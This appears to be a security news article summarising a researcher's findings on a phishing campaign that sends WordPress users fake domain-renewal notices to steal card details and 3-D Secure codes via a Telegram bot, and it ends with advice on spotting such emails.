Ddos 
Image: Anurag
A sophisticated new phishing campaign is targeting WordPress site owners with fake “domain renewal” notices, tricking victims into handing over credit card details and 3-D Secure OTPs. Threat researcher Anurag has uncovered the operation, which bypasses traditional command-and-control servers by exfiltrating stolen data directly to attackers via Telegram.
The scam begins with an email bearing the subject line “Renewal due soon – Action required.” While the message creates a sense of panic, Anurag’s analysis highlights a critical error: “A critical red flag in this email is the absence of any specific domain name, which is highly unusual for a legitimate renewal notice”.
Victims who click the “Renew Now” button are redirected to a fraudulent payment page hosted on soyfix[.]com. The site is a near-perfect replica of a legitimate WordPress checkout flow.
“The phishing page is carefully designed to visually mimic a legitimate WordPress checkout flow, creating a false sense of trust for the victim,” Anurag notes. It features a “Secure order validation” banner, branded credit card logos, and a realistic pricing breakdown (e.g., $13.00 subtotal, $2.73 VAT).
However, the “order” is fake. The page logic collects the victim’s Cardholder Name, Card Number, Expiry Date, and CVV, transmitting them immediately to the attacker.
In a devious twist, the attackers don’t just steal the card; they attempt to bypass 3-D Secure protections. After the card details are submitted, the site displays a fake “3D Secure Verification” modal, prompting the victim to enter an SMS code.
The script then engages in “psychological trust mechanisms,” such as a 7-second loading screen and a 4-second “verification processing” delay, to make the theft appear like a genuine banking transaction.
Crucially, the page is programmed to fail. “The page always returns ‘Verification failed’, forcing victims to re-enter OTPs, allowing attackers to harvest multiple valid codes”.
The campaign’s infrastructure is notable for its reliance on legitimate messaging apps. Instead of sending data to a suspicious server, the backend scripts (send_payment.php and send_sms.php) forward the stolen credentials to a Telegram bot.
“Despite the generic filename, console messages and code comments explicitly state the data is forwarded to Telegram, indicating the attacker is using a Telegram bot/channel as a Command & Control (C2) exfiltration mechanism”.
This method is increasingly popular because it “incurs minimal infrastructure costs” and is “significantly harder to disrupt or take down compared to conventional hosted C2 panels”.
The initial phishing emails were sent from admin@theyounginevitables.com, a domain spoofing WordPress support. Analysis of the email headers revealed that the domain had a weak DMARC policy (p=NONE), allowing the attackers to spoof the sender identity without restriction.
WordPress users are advised to be skeptical of any renewal notice that does not specify the domain name in question and to verify their account status directly through the official WordPress.com dashboard.
Related Posts:
- WhatsApp Phishing Campaign Targets SBI Bank Users with Malicious App
- Massive Android SMS Stealer Campaign Uncovered: Over 100,000 Malicious Apps Targeting Global Users
- Malicious npm Packages Backdoor Telegram Bot Developers
- APT36 Targets Indian Government with Sophisticated Phishing, Bypassing MFA with Real-Time OTP Harvest
- Glitch Platform Abused: Phishing Campaigns Circumvent MFA and Target Credit Unions
Donate